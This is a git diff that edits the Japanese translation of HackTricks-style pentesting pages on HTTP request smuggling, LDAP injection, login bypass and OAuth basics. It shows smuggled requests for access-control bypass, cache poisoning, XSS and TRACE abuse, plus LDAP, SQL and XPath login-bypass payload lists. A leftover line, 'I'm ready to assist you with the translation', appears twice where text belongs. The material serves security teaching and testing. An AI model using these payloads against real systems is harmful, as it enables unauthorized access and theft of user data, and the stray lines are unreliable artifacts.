 - ホストヘッダーの悪用: ホストルーティングの特異性と組み合わせて内部vhostsにピボットする。
 - オペレーターのワークフロー
-- 制御された再利用で再現する(Turbo Intruderの`requestsPerConnection=2`、またはBurp Repeaterタブグループ→「グループを順番に送信(単一接続)」)。
+- 制御された再利用で再現する(Turbo Intruder `requestsPerConnection=2`、またはBurp Repeaterタブグループ→"グループを順番に送信(単一接続)")。
 - その後、キャッシュ/ヘッダー漏洩/制御バイパスのプリミティブにチェーンし、クロスユーザーまたは認証の影響を示す。
 
 > 接続状態攻撃も参照してください。これは密接に関連していますが、技術的にはスムグリングではありません:
@@ -365,9 +365,9 @@ Impact: なし。クライアントがサーバーフレーミングからデシ
 
 ### クライアント側デシンクの制約
 
-ブラウザ駆動/クライアント側デシンクをターゲットにしている場合、悪意のあるリクエストはブラウザからクロスオリジンで送信可能でなければなりません。ヘッダーの難読化トリックは機能しません。ナビゲーション/フェッチを介して到達可能なプリミティブに焦点を当て、その後、キャッシュポイズニング、ヘッダー開示、またはフロントエンド制御のバイパスにピボットします。下流コンポーネントがレスポンスを反映またはキャッシュする場合。
+ブラウザ駆動/クライアント側デシンクをターゲットにしている場合、悪意のあるリクエストはブラウザからクロスオリジンで送信可能でなければなりません。ヘッダーの難読化トリックは機能しません。ナビゲーション/フェッチを介して到達可能なプリミティブに焦点を当て、その後キャッシュポイズニング、ヘッダー開示、またはフロントエンド制御のバイパスにピボットします。下流コンポーネントがレスポンスを反映またはキャッシュする場合。
 
-背景とエンドツーエンドのワークフローについて:
+背景とエンドツーエンドのワークフローについては:
 
 {{#ref}}
 browser-http-request-smuggling.md
@@ -376,7 +376,7 @@ browser-http-request-smuggling.md
 ### 決定を助けるツール
 
 - HTTP Hacker (Burp BApp Store): 低レベルのHTTP動作とソケットの連結を公開します。
-- 「スムグリングまたはパイプライン?」Burp Repeaterカスタムアクション: https://github.com/PortSwigger/bambdas/blob/main/CustomAction/SmugglingOrPipelining.bambda
+- "スムグリングまたはパイプライン?" Burp Repeaterカスタムアクション: https://github.com/PortSwigger/bambdas/blob/main/CustomAction/SmugglingOrPipelining.bambda
 - Turbo Intruder: `requestsPerConnection`を介して接続再利用を正確に制御します。
 - Burp HTTP Request Smuggler: 最初のリクエストのルーティング/検証を見つけるための接続状態プローブを含みます。
 
@@ -385,7 +385,7 @@ browser-http-request-smuggling.md
 
 ## HTTPリクエストスムグリングの悪用
 
-### HTTPリクエストスムグリングを介してフロントエンドセキュリティを回避する
+### HTTPリクエストスムグリングを介したフロントエンドセキュリティの回避
 
 時には、フロントエンドプロキシがセキュリティ対策を強化し、受信リクエストを精査します。しかし、これらの対策はHTTPリクエストスムグリングを利用することで回避でき、制限されたエンドポイントへの不正アクセスを可能にします。たとえば、`/admin`へのアクセスは外部から禁止されているかもしれませんが、フロントエンドプロキシはそのような試みを積極的にブロックしています。それにもかかわらず、このプロキシはスムグリングされたHTTPリクエスト内の埋め込まれたリクエストを検査しない可能性があり、これによりこれらの制限を回避するための抜け穴が残ります。
 
@@ -426,7 +426,7 @@ a=x
 0
 
 ```
-逆に、TE.CL攻撃では、最初の`POST`リクエストが`Transfer-Encoding: chunked`を使用し、次に埋め込まれたリクエストは`Content-Length`ヘッダーに基づいて処理されます。CL.TE攻撃と同様に、フロントエンドプロキシは密輸された`GET /admin`リクエストを見落とし、意図せずに制限された`/admin`パスへのアクセスを許可します。
+逆に、TE.CL攻撃では、最初の`POST`リクエストが`Transfer-Encoding: chunked`を使用し、その後の埋め込まれたリクエストは`Content-Length`ヘッダーに基づいて処理されます。CL.TE攻撃と同様に、フロントエンドプロキシは密輸された`GET /admin`リクエストを見落とし、意図せずに制限された`/admin`パスへのアクセスを許可します。
 
 ### フロントエンドリクエストの書き換えを明らかにする 
 
@@ -483,16 +483,16 @@ csrf=gpGAVAbj7pKq7VfFh45CAICeFCnancCM&postId=4&name=asdfghjklo&email=email%40ema
 ```
 このシナリオでは、**comment parameter**は公開アクセス可能なページの投稿コメントセクション内の内容を保存することを目的としています。その結果、次のリクエストの内容はコメントとして表示されます。
 
-しかし、この技術には制限があります。一般的に、これはスムグルされたリクエストで使用されるパラメータ区切り文字までのデータしかキャプチャしません。URLエンコードされたフォーム送信の場合、この区切り文字は`&`文字です。これは、被害者ユーザーのリクエストからキャプチャされた内容が最初の`&`で止まることを意味し、これはクエリ文字列の一部である可能性さえあります。
+しかし、この技術には制限があります。一般的に、これはスムグルされたリクエストで使用されるパラメータ区切り文字までのデータしかキャプチャしません。URLエンコードされたフォーム送信の場合、この区切り文字は`&`文字です。つまり、被害者ユーザーのリクエストからキャプチャされた内容は最初の`&`で止まり、これはクエリ文字列の一部である可能性もあります。
 
-さらに、このアプローチはTE.CL脆弱性でも有効であることに注意する価値があります。その場合、リクエストは`search=\r\n0`で終了する必要があります。改行文字に関係なく、値は検索パラメータに追加されます。
+さらに、このアプローチはTE.CL脆弱性でも有効であることに注意が必要です。その場合、リクエストは`search=\r\n0`で終了する必要があります。改行文字に関係なく、値は検索パラメータに追加されます。
 
 ### HTTPリクエストスムグリングを使用して反射型XSSを悪用する
 
 HTTP Request Smugglingは、**Reflected XSS**に脆弱なウェブページを悪用するために利用でき、重要な利点を提供します:
 
-- 対象ユーザーとの**対話は不要**です。
-- HTTPリクエストヘッダーのような**通常は到達不可能な**リクエストの一部でXSSを悪用することができます。
+- 対象ユーザーとの**インタラクションは不要**です。
+- 通常は**アクセスできない**リクエストの一部、例えばHTTPリクエストヘッダーでXSSを悪用することができます。
 
 ウェブサイトがUser-Agentヘッダーを通じて反射型XSSに対して脆弱な場合、以下のペイロードはこの脆弱性を悪用する方法を示しています:
 ```
@@ -528,23 +528,23 @@ A=
 > [!CAUTION]
 > ユーザーコンテンツが **`Content-type`** が **`text/plain`** のレスポンスに反映される場合、XSS の実行が防止されます。サーバーが **HTTP/0.9** をサポートしている場合、これを回避できる可能性があります!
 
-HTTP/0.9 バージョンは 1.0 の前のもので、**GET** 動詞のみを使用し、**ヘッダー** ではなくボディのみで応答します。
+HTTP/0.9 バージョンは 1.0 の前のもので、**GET** 動詞のみを使用し、**ヘッダー** には応答せず、ボディのみを返します。
 
-[**この書き込み**](https://mizu.re/post/twisty-python) では、リクエストスムーグリングと **ユーザーの入力に応じて応答する脆弱なエンドポイント** を使用して、HTTP/0.9 でリクエストをスムーグルしました。レスポンスに反映されるパラメータには **偽の HTTP/1.1 レスポンス(ヘッダーとボディを含む)** が含まれており、レスポンスには `Content-Type` が `text/html` の有効な実行可能な JS コードが含まれます。
+[**この書き込み**](https://mizu.re/post/twisty-python) では、リクエストスムーグリングと **ユーザーの入力に応じて応答する脆弱なエンドポイント** を利用して、HTTP/0.9 でリクエストをスムーグルしました。レスポンスに反映されるパラメータには **偽の HTTP/1.1 レスポンス(ヘッダーとボディを含む)** が含まれており、レスポンスには `Content-Type` が `text/html` の有効な実行可能な JS コードが含まれます。
 
-### HTTP リクエストスムーグリングを使用したオンサイトリダイレクトの悪用 
+### HTTP リクエストスムーグリングを用いたオンサイトリダイレクトの悪用 
 
 アプリケーションは、リダイレクト URL の `Host` ヘッダーからホスト名を使用して、ある URL から別の URL にリダイレクトすることがよくあります。これは、Apache や IIS のようなウェブサーバーで一般的です。たとえば、末尾にスラッシュがないフォルダーをリクエストすると、スラッシュを含めるようにリダイレクトされます:
 ```
 GET /home HTTP/1.1
 Host: normal-website.com
 ```
-結果は:
+結果は次のとおりです:
 ```
 HTTP/1.1 301 Moved Permanently
 Location: https://normal-website.com/home/
 ```
-この動作は一見無害に見えますが、HTTPリクエストスムーグリングを使用してユーザーを外部サイトにリダイレクトするように操作できます。例えば:
+この行動は一見無害に見えますが、HTTPリクエストスムーギングを使用してユーザーを外部サイトにリダイレクトするように操作できます。例えば:
 ```
 POST / HTTP/1.1
 Host: vulnerable-website.com
@@ -572,15 +572,15 @@ Location: https://attacker-website.com/home/
 ```
 このシナリオでは、ユーザーのJavaScriptファイルへのリクエストがハイジャックされます。攻撃者は、応答として悪意のあるJavaScriptを提供することで、ユーザーを危険にさらす可能性があります。
 
-### HTTPリクエストスムージングによるウェブキャッシュポイズニングの悪用 
+### HTTPリクエストスムージングを介したウェブキャッシュポイズニングの悪用 
 
 ウェブキャッシュポイズニングは、**フロントエンドインフラストラクチャがコンテンツをキャッシュする**任意のコンポーネントがある場合に実行できます。通常、これはパフォーマンスを向上させるためです。サーバーの応答を操作することで、**キャッシュをポイズン**することが可能です。
 
-以前、サーバーの応答を変更して404エラーを返す方法を観察しました([基本的な例](#basic-examples)を参照)。同様に、サーバーを騙して`/static/include.js`へのリクエストに対して`/index.html`のコンテンツを配信させることも可能です。その結果、`/static/include.js`のコンテンツがキャッシュ内で`/index.html`のもので置き換えられ、ユーザーが`/static/include.js`にアクセスできなくなり、サービス拒否(DoS)につながる可能性があります。
+以前、サーバーの応答を変更して404エラーを返す方法を観察しました([基本的な例](#basic-examples)を参照)。同様に、サーバーを騙して`/static/include.js`へのリクエストに対して`/index.html`のコンテンツを提供させることも可能です。その結果、`/static/include.js`のコンテンツがキャッシュ内で`/index.html`のもので置き換えられ、ユーザーが`/static/include.js`にアクセスできなくなり、サービス拒否(DoS)につながる可能性があります。
 
-この技術は、**オープンリダイレクトの脆弱性**が発見された場合や、**オープンリダイレクトへのオンサイトリダイレクト**がある場合に特に強力になります。このような脆弱性を悪用して、攻撃者の制御下にあるスクリプトで`/static/include.js`のキャッシュコンテンツを置き換えることができ、実質的にすべてのクライアントに対して更新された`/static/include.js`に対する広範なクロスサイトスクリプティング(XSS)攻撃を可能にします。
+この技術は、**オープンリダイレクトの脆弱性**が発見された場合や、**オープンリダイレクトへのオンサイトリダイレクト**がある場合に特に強力になります。このような脆弱性を悪用して、攻撃者の制御下にあるスクリプトで`/static/include.js`のキャッシュコンテンツを置き換えることができ、実質的にすべてのクライアントに対して広範なクロスサイトスクリプティング(XSS)攻撃を可能にします。
 
-以下は、**キャッシュポイズニングとオープンリダイレクトへのオンサイトリダイレクトを組み合わせた悪用**の例です。目的は、攻撃者が制御するJavaScriptコードを提供するために`/static/include.js`のキャッシュコンテンツを変更することです:
+以下は、**オープンリダイレクトへのオンサイトリダイレクトと組み合わせたキャッシュポイズニングの悪用**の例です。目的は、攻撃者が制御するJavaScriptコードを提供するために`/static/include.js`のキャッシュコンテンツを変更することです:
 ```
 POST / HTTP/1.1
 Host: vulnerable.net
@@ -600,16 +600,16 @@ x=1
 ```
 埋め込まれたリクエストが `/post/next?postId=3` をターゲットにしていることに注意してください。このリクエストは `/post?postId=4` にリダイレクトされ、**Host ヘッダーの値**を利用してドメインを決定します。**Host ヘッダー**を変更することで、攻撃者はリクエストを自分のドメインにリダイレクトできます(**オンサイトリダイレクトからオープンリダイレクト**)。
 
-成功した**ソケットポイズニング**の後、`/static/include.js` に対する**GETリクエスト**を開始する必要があります。このリクエストは、以前の**オンサイトリダイレクトからオープンリダイレクト**リクエストによって汚染され、攻撃者が制御するスクリプトの内容を取得します。
+成功した **ソケットポイズニング** の後、`/static/include.js` に対する **GET リクエスト** を開始する必要があります。このリクエストは、前の **オンサイトリダイレクトからオープンリダイレクト** リクエストによって汚染され、攻撃者が制御するスクリプトの内容を取得します。
 
-その後、`/static/include.js` に対するリクエストは、攻撃者のスクリプトのキャッシュされた内容を提供し、効果的に広範なXSS攻撃を開始します。
+その後、`/static/include.js` に対するリクエストは、攻撃者のスクリプトのキャッシュされた内容を提供し、効果的に広範な XSS 攻撃を開始します。
 
-### HTTPリクエストスムージングを使用してウェブキャッシュの欺瞞を実行する 
+### HTTP リクエストスムージングを使用してウェブキャッシュの欺瞞を実行する 
 
 > **ウェブキャッシュポイズニングとウェブキャッシュの欺瞞の違いは何ですか?**
 >
-> - **ウェブキャッシュポイズニング**では、攻撃者がアプリケーションに悪意のあるコンテンツをキャッシュに保存させ、そのコンテンツが他のアプリケーションユーザーに提供されます。
-> - **ウェブキャッシュの欺瞞**では、攻撃者がアプリケーションに他のユーザーに属する機密コンテンツをキャッシュに保存させ、攻撃者がそのコンテンツをキャッシュから取得します。
+> - **ウェブキャッシュポイズニング** では、攻撃者がアプリケーションに悪意のあるコンテンツをキャッシュに保存させ、そのコンテンツが他のアプリケーションユーザーに提供されます。
+> - **ウェブキャッシュの欺瞞** では、攻撃者がアプリケーションに他のユーザーに属する機密コンテンツをキャッシュに保存させ、攻撃者がそのコンテンツをキャッシュから取得します。
 
 攻撃者は、機密のユーザー固有のコンテンツを取得するためのスムージングリクエストを作成します。次の例を考えてみてください:
 ```markdown
@@ -622,17 +622,17 @@ x=1
 `GET /private/messages HTTP/1.1`\
 `Foo: X`
 ```
-もしこのスムグルされたリクエストが静的コンテンツ(例:`/someimage.png`)用のキャッシュエントリを汚染すると、被害者の`/private/messages`からの機密データが静的コンテンツのキャッシュエントリの下にキャッシュされる可能性があります。その結果、攻撃者はこれらのキャッシュされた機密データを取得できるかもしれません。
+このスムグルされたリクエストが静的コンテンツ(例:`/someimage.png`)用のキャッシュエントリを汚染すると、被害者の`/private/messages`からの機密データが静的コンテンツのキャッシュエントリの下にキャッシュされる可能性があります。その結果、攻撃者はこれらのキャッシュされた機密データを取得できる可能性があります。
 
 ### HTTPリクエストスムグリングを利用したTRACEの悪用 
 
-[**この投稿**](https://portswigger.net/research/trace-desync-attack)では、サーバーにTRACEメソッドが有効になっている場合、HTTPリクエストスムグリングを利用して悪用できる可能性があると示唆されています。これは、このメソッドがサーバーに送信された任意のヘッダーをレスポンスのボディの一部として反映するためです。例えば:
+[**この投稿**](https://portswigger.net/research/trace-desync-attack)では、サーバーにTRACEメソッドが有効になっている場合、HTTPリクエストスムグリングを使用して悪用できる可能性があると示唆されています。これは、このメソッドがサーバーに送信された任意のヘッダーをレスポンスのボディの一部として反映するためです。例えば:
 ```
 TRACE / HTTP/1.1
 Host: example.com
 XSS: 
 ```
-I'm ready to assist you with the translation. Please provide the text you would like me to translate.
+I'm ready to assist you with the translation. Please provide the text you would like to have translated.
 ```
 HTTP/1.1 200 OK
 Content-Type: message/http
@@ -643,15 +643,15 @@ Host: vulnerable.com
 XSS: 
 X-Forwarded-For: xxx.xxx.xxx.xxx
 ```
-この動作を悪用する例としては、**最初にHEADリクエストをスムグル**ことが挙げられます。このリクエストには、GETリクエストの**ヘッダー**のみが応答されます(その中には**`Content-Type`**が含まれます)。そして、**HEADの直後にTRACEリクエストをスムグル**ことで、**送信されたデータを反映させる**ことができます。\
-HEADの応答には`Content-Length`ヘッダーが含まれるため、**TRACEリクエストの応答はHEAD応答のボディとして扱われ、したがって任意のデータを応答に反映させることができます**。\
+この動作を悪用する例としては、**最初にHEADリクエストをスムグル**ことが挙げられます。このリクエストには、GETリクエストの**ヘッダー**のみが応答されます(その中には**`Content-Type`**も含まれます)。そして、**HEADの後にすぐにTRACEリクエストをスムグル**し、送信されたデータを**反映させる**ことができます。\
+HEADの応答には`Content-Length`ヘッダーが含まれるため、**TRACEリクエストの応答はHEAD応答のボディとして扱われ、したがって任意のデータが応答に反映されます**。\
 この応答は接続上の次のリクエストに送信されるため、例えば**キャッシュされたJSファイルで任意のJSコードを注入するために使用される可能性があります**。
 
 ### HTTPレスポンス分割を介したTRACEの悪用 
 
-[**この投稿**](https://portswigger.net/research/trace-desync-attack)を引き続き参照することが、TRACEメソッドを悪用する別の方法として提案されています。コメントの通り、HEADリクエストとTRACEリクエストをスムグルことで、HEADリクエストの応答における**反映されたデータの一部を制御する**ことが可能です。HEADリクエストのボディの長さは基本的にContent-Lengthヘッダーで示され、TRACEリクエストの応答によって形成されます。
+[**この投稿**](https://portswigger.net/research/trace-desync-attack)を続けると、TRACEメソッドを悪用する別の方法が提案されています。コメントされたように、HEADリクエストとTRACEリクエストをスムグルすることで、HEADリクエストへの応答における**反映されたデータの一部を制御する**ことが可能です。HEADリクエストのボディの長さは基本的にContent-Lengthヘッダーで示され、TRACEリクエストへの応答によって形成されます。
 
-したがって、新しいアイデアは、このContent-LengthとTRACE応答で与えられたデータを知ることで、Content-Lengthの最後のバイトの後に有効なHTTP応答を含むTRACE応答を作成できるということです。これにより、攻撃者は次の応答へのリクエストを完全に制御できるようになり(キャッシュポイズニングを実行するために使用される可能性があります)、
+したがって、新しいアイデアは、このContent-LengthとTRACE応答で与えられたデータを知ることで、TRACE応答がContent-Lengthの最後のバイトの後に有効なHTTP応答を含むようにすることが可能であり、攻撃者が次の応答へのリクエストを完全に制御できるようにすることです(これによりキャッシュポイズニングを実行することができます)。
 
 例:
 ```
@@ -693,23 +693,26 @@ Content-Length: 50
 
 
 ```
-### HTTPリクエストスムージングをHTTPレスポンスデシンクロナイゼーションで武器化する
+### HTTPリクエストスムーギングをHTTPレスポンスデシンクロナイゼーションで武器化する
+
+HTTPリクエストスムーギングの脆弱性を見つけたが、どのように悪用するかわからない場合は、他の悪用方法を試してみてください:
 
-HTTPリクエストスムージングの脆弱性を見つけたが、どのように悪用するかわからない場合は、他の悪用方法を試してみてください:
 
 {{#ref}}
 ../http-response-smuggling-desync.md
 {{#endref}}
 
-### その他のHTTPリクエストスムージング技術
+### その他のHTTPリクエストスムーギング技術
+
+- ブラウザHTTPリクエストスムーギング(クライアントサイド)
 
-- ブラウザHTTPリクエストスムージング(クライアントサイド)
 
 {{#ref}}
 browser-http-request-smuggling.md
 {{#endref}}
 
-- HTTP/2ダウングレードにおけるリクエストスムージング
+- HTTP/2ダウングレードにおけるリクエストスムーギング
+
 
 {{#ref}}
 request-smuggling-in-http-2-downgrades.md
@@ -805,7 +808,7 @@ table.add(req)
 ## ツール
 
 - HTTP Hacker (Burp BApp Store) – 連結/フレーミングと低レベルのHTTP動作を可視化
-- https://github.com/PortSwigger/bambdas/blob/main/CustomAction/SmugglingOrPipelining.bambda Burp Repeater Custom Action "Smuggling or pipelining?"
+- https://github.com/PortSwigger/bambdas/blob/main/CustomAction/SmugglingOrPipelining.bambda Burp Repeater カスタムアクション "Smuggling or pipelining?"
 - [https://github.com/anshumanpattnaik/http-request-smuggling](https://github.com/anshumanpattnaik/http-request-smuggling)
 - [https://github.com/PortSwigger/http-request-smuggler](https://github.com/PortSwigger/http-request-smuggler)
 - [https://github.com/gwen001/pentest-tools/blob/master/smuggler.py](https://github.com/gwen001/pentest-tools/blob/master/smuggler.py)
diff --git a/src/pentesting-web/ldap-injection.md b/src/pentesting-web/ldap-injection.md
index 0a1f1039a..d3743b3d4 100644
--- a/src/pentesting-web/ldap-injection.md
+++ b/src/pentesting-web/ldap-injection.md
@@ -1,47 +1,48 @@
-# LDAPインジェクション
+# LDAP Injection
 
 {{#include ../banners/hacktricks-training.md}}
 
-## LDAPインジェクション
+## LDAP Injection
 
 ### **LDAP**
 
-**LDAPについて知りたい場合は、以下のページにアクセスしてください:**
+**LDAPとは何かを知りたい場合は、以下のページにアクセスしてください:**
+
 
 {{#ref}}
 ../network-services-pentesting/pentesting-ldap.md
 {{#endref}}
 
-**LDAPインジェクション**は、ユーザー入力からLDAPステートメントを構築するウェブアプリケーションを対象とした攻撃です。アプリケーションが入力を**適切にサニタイズ**しない場合に発生し、攻撃者がローカルプロキシを通じて**LDAPステートメントを操作**できるようになり、無許可のアクセスやデータ操作につながる可能性があります。
+**LDAP Injection**は、ユーザー入力からLDAPステートメントを構築するWebアプリケーションを対象とした攻撃です。アプリケーションが入力を**適切にサニタイズしない**場合に発生し、攻撃者がローカルプロキシを通じて**LDAPステートメントを操作**できるようになり、無許可のアクセスやデータ操作につながる可能性があります。
 
 {{#file}}
 EN-Blackhat-Europe-2008-LDAP-Injection-Blind-LDAP-Injection.pdf
 {{#endfile}}
 
-**フィルター** = ( filtercomp )\
-**フィルターコンポ** = and / or / not / item\
+**Filter** = ( filtercomp )\
+**Filtercomp** = and / or / not / item\
 **And** = & filterlist\
 **Or** = |filterlist\
 **Not** = ! filter\
-**フィルターリスト** = 1\*filter\
-**アイテム**= simple / present / substring\
-**シンプル** = attr filtertype assertionvalue\
-**フィルタータイプ** = _'=' / '\~=' / '>=' / '<='_\
-**プレゼント** = attr = \*\
-**サブストリング** = attr ”=” \[initial] \* \[final]\
-**初期** = assertionvalue\
-**最終** = assertionvalue\
-**(&)** = 絶対TRUE\
-**(|)** = 絶対FALSE
+**Filterlist** = 1\*filter\
+**Item**= simple / present / substring\
+**Simple** = attr filtertype assertionvalue\
+**Filtertype** = _'=' / '\~=' / '>=' / '<='_\
+**Present** = attr = \*\
+**Substring** = attr ”=” \[initial] \* \[final]\
+**Initial** = assertionvalue\
+**Final** = assertionvalue\
+**(&)** = Absolute TRUE\
+**(|)** = Absolute FALSE
 
-例えば:\
+例えば:\
 `(&(!(objectClass=Impresoras))(uid=s*))`\
 `(&(objectClass=user)(uid=*))`
 
-データベースにアクセスでき、これにはさまざまなタイプの情報が含まれる可能性があります。
+データベースにアクセスでき、さまざまなタイプの情報が含まれている可能性があります。
 
 **OpenLDAP**: 2つのフィルターが到着した場合、最初のフィルターのみを実行します。\
-**ADAMまたはMicrosoft LDS**: 2つのフィルターがあるとエラーが発生します。\
+**ADAMまたはMicrosoft LDS**: 2つのフィルターでエラーが発生します。\
 **SunOne Directory Server 5.0**: 両方のフィルターを実行します。
 
 **正しい構文でフィルターを送信することが非常に重要です。さもなければエラーが発生します。フィルターは1つだけ送信する方が良いです。**
@@ -54,7 +55,7 @@ EN-Blackhat-Europe-2008-LDAP-Injection-Blind-LDAP-Injection.pdf
 
 次に: `(&(objectClass=`**`*)(ObjectClass=*))`** が最初のフィルター(実行されるもの)になります。
 
-### ログインバイパス
+### Login Bypass
 
 LDAPは、パスワードを保存するためのいくつかの形式をサポートしています: clear, md5, smd5, sh1, sha, crypt。したがって、パスワードに何を挿入しても、ハッシュ化される可能性があります。
 ```bash
@@ -148,7 +149,7 @@ ascii文字、数字、記号を繰り返し処理できます:
 
 #### **有効なLDAPフィールドを発見する**
 
-LDAPオブジェクトは**デフォルトでいくつかの属性を含んでおり**、それを使って**情報を保存する**ことができます。**それらすべてをブルートフォースして情報を抽出する**ことを試みることができます。[**デフォルトのLDAP属性のリストはこちら**](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP%20Injection/Intruder/LDAP_attributes.txt)で見つけることができます。
+LDAPオブジェクトは**デフォルトでいくつかの属性を含んでおり**、それを使って**情報を保存する**ことができます。**すべてをブルートフォースしてその情報を抽出する**ことを試みることができます。 [**デフォルトのLDAP属性のリストはこちら**](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP%20Injection/Intruder/LDAP_attributes.txt)で見つけることができます。
 ```python
 #!/usr/bin/python3
 import requests
@@ -203,6 +204,7 @@ intitle:"phpLDAPadmin" inurl:cmd.php
 ```
 ### さらなるペイロード
 
+
 {{#ref}}
 https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection
 {{#endref}}
diff --git a/src/pentesting-web/login-bypass/README.md b/src/pentesting-web/login-bypass/README.md
index a9d6f79cd..e6442b325 100644
--- a/src/pentesting-web/login-bypass/README.md
+++ b/src/pentesting-web/login-bypass/README.md
@@ -4,28 +4,28 @@
 
 ## **通常のログインをバイパスする**
 
-ログインページを見つけた場合、バイパスするためのいくつかのテクニックを試すことができます:
+ログインページを見つけた場合、ここでバイパスするためのいくつかのテクニックを試すことができます:
 
 - ページ内の**コメント**を確認する(下にスクロールして右に?)
 - **制限されたページに直接アクセスできるか**確認する
 - **パラメータを送信しない**(何も送信しないか、1つだけ送信する)
 - **PHPの比較エラーを確認する:** `user[]=a&pwd=b` , `user=a&pwd[]=b` , `user[]=a&pwd[]=b`
 - **コンテンツタイプをjsonに変更**し、json値を送信する(bool trueを含む)
-- POSTがサポートされていないという応答が返ってきた場合、**GETリクエストでボディにJSONを送信**してみることができます `Content-Type: application/json`
-- nodejsの潜在的なパースエラーを確認する([**これを読む**](https://flattsecurity.medium.com/finding-an-unseen-sql-injection-by-bypassing-escape-functions-in-mysqljs-mysql-90b27f6542b4)): `password[password]=1`
+- POSTがサポートされていないという応答が返ってきた場合、**GETリクエストでボディにJSONを送信**することを試みる(`Content-Type: application/json`を使用)
+- nodejsの潜在的なパースエラーを確認する([**これ**](https://flattsecurity.medium.com/finding-an-unseen-sql-injection-by-bypassing-escape-functions-in-mysqljs-mysql-90b27f6542b4)を読む): `password[password]=1`
 - Nodejsはそのペイロードを次のようなクエリに変換します: ` SELECT id, username, left(password, 8) AS snipped_password, email FROM accounts WHERE username='admin' AND`` `` `**`password=password=1`**`;` これにより、パスワードビットが常にtrueになります。
 - JSONオブジェクトを送信できる場合、`"password":{"password": 1}`を送信してログインをバイパスできます。
 - このログインをバイパスするには、**有効なユーザー名を知って送信する必要がある**ことを忘れないでください。
-- `mysql.createConnection`を呼び出すときに**`"stringifyObjects":true`**オプションを追加すると、**`Object`がパラメータに渡されたときのすべての予期しない動作をブロック**します。
+- `mysql.createConnection`を呼び出す際に**`"stringifyObjects":true`**オプションを追加すると、**`Object`がパラメータに渡されたときのすべての予期しない動作をブロック**できます。
 - 認証情報を確認する:
 - 使用されている技術/プラットフォームの[**デフォルトの認証情報**](../../generic-hacking/brute-force.md#default-credentials)
 - **一般的な組み合わせ**(root、admin、password、技術の名前、これらのパスワードのいずれかを持つデフォルトユーザー)。
 - **Cewl**を使用して辞書を作成し、**デフォルト**のユーザー名とパスワード(ある場合)を追加し、すべての単語を**ユーザー名とパスワード**としてブルートフォースを試みる
-- **より大きな辞書を使用してブルートフォース**(**[ブルートフォース](../../generic-hacking/brute-force.md#http-post-form)**)
+- **より大きな辞書を使用してブルートフォース**(**[**ブルートフォース**](../../generic-hacking/brute-force.md#http-post-form)**) 
 
 ### SQLインジェクション認証バイパス
 
-[ここでは、**SQLインジェクション**を介してログインをバイパスするためのいくつかのトリックを見つけることができます](../sql-injection/index.html#authentication-bypass)。
+[ここで**SQLインジェクション**を介してログインをバイパスするためのいくつかのトリックを見つけることができます](../sql-injection/index.html#authentication-bypass)。
 
 次のページでは、SQLインジェクションを介してログインをバイパスするための**カスタムリスト**を見つけることができます:
 
@@ -35,13 +35,13 @@ sql-login-bypass.md
 
 ### NoSQLインジェクション認証バイパス
 
-[ここでは、**NoSQLインジェクション**を介してログインをバイパスするためのいくつかのトリックを見つけることができます](../nosql-injection.md#basic-authentication-bypass)**。**
+[ここで**NoSQLインジェクション**を介してログインをバイパスするためのいくつかのトリックを見つけることができます](../nosql-injection.md#basic-authentication-bypass)**。**
 
 NoSQLインジェクションはパラメータの値を変更する必要があるため、手動でテストする必要があります。
 
 ### XPathインジェクション認証バイパス
 
-[ここでは、**XPathインジェクション**を介してログインをバイパスするためのいくつかのトリックを見つけることができます](../xpath-injection.md#authentication-bypass)
+[ここで**XPathインジェクション**を介してログインをバイパスするためのいくつかのトリックを見つけることができます](../xpath-injection.md#authentication-bypass)
 ```
 ' or '1'='1
 ' or ''='
@@ -57,9 +57,9 @@ NoSQLインジェクションはパラメータの値を変更する必要があ
 admin' or '
 admin' or '1'='2
 ```
-### LDAPインジェクション認証バイパス
+### LDAP Injection 認証バイパス
 
-[ここでは、**LDAPインジェクション**を介してログインをバイパスするためのいくつかのトリックを見つけることができます。](../ldap-injection.md#login-bypass)
+[ここでは、**LDAP Injection**を介してログインをバイパスするためのいくつかのトリックを見つけることができます。](../ldap-injection.md#login-bypass)
 ```
 *
 *)(&
@@ -84,7 +84,7 @@ admin))(|(|
 ## Other Checks
 
 - ログイン機能を悪用して **ユーザー名を列挙** できるか確認してください。
-- パスワード/**sensitive** 情報 **フォーム** の **入力** において **自動補完** が有効になっているか確認してください: ``
+- パスワード/**敏感な**情報 **フォーム** の **入力** に **自動補完** が有効になっているか確認してください: ``
 
 ## Automatic Tools
 
diff --git a/src/pentesting-web/oauth-to-account-takeover.md b/src/pentesting-web/oauth-to-account-takeover.md
index 478965fb3..3b80433fe 100644
--- a/src/pentesting-web/oauth-to-account-takeover.md
+++ b/src/pentesting-web/oauth-to-account-takeover.md
@@ -4,9 +4,9 @@
 
 ## Basic Information 
 
-OAuthはさまざまなバージョンを提供しており、基本的な洞察は[OAuth 2.0 documentation](https://oauth.net/2/)でアクセス可能です。この議論は主に広く使用されている[OAuth 2.0 authorization code grant type](https://oauth.net/2/grant-types/authorization-code/)に焦点を当てており、**アプリケーションが他のアプリケーション内のユーザーのアカウントにアクセスまたはアクションを実行できるようにする認可フレームワーク**を提供します(認可サーバー)。
+OAuthはさまざまなバージョンを提供しており、基本的な洞察は[OAuth 2.0 documentation](https://oauth.net/2/)で入手できます。この議論は主に広く使用されている[OAuth 2.0 authorization code grant type](https://oauth.net/2/grant-types/authorization-code/)に焦点を当てており、**アプリケーションが他のアプリケーションのユーザーアカウントにアクセスしたり、アクションを実行したりすることを可能にする認可フレームワーク**を提供します(認可サーバー)。
 
-仮想のウェブサイト_**https://example.com**_を考えてみてください。これは**すべてのソーシャルメディア投稿を表示する**ために設計されています。プライベートな投稿も含まれます。これを実現するために、OAuth 2.0が使用されます。_https://example.com_は**あなたのソーシャルメディア投稿にアクセスする**ための許可を求めます。その結果、_https://socialmedia.com_に同意画面が表示され、**要求されている権限とリクエストを行っている開発者**が示されます。あなたが承認すると、_https://example.com_は**あなたの代わりに投稿にアクセスする**能力を得ます。
+仮想のウェブサイト_**https://example.com**_を考えてみてください。これは**すべてのソーシャルメディア投稿を表示する**ために設計されています。プライベートな投稿も含まれます。これを実現するために、OAuth 2.0が使用されます。_https://example.com_は、**あなたのソーシャルメディア投稿にアクセスする**ための許可を求めます。その結果、_https://socialmedia.com_に同意画面が表示され、**要求されている権限とリクエストを行っている開発者**が示されます。あなたが承認すると、_https://example.com_は**あなたの代わりに投稿にアクセスする**能力を得ます。
 
 OAuth 2.0フレームワーク内の以下のコンポーネントを理解することが重要です:
 
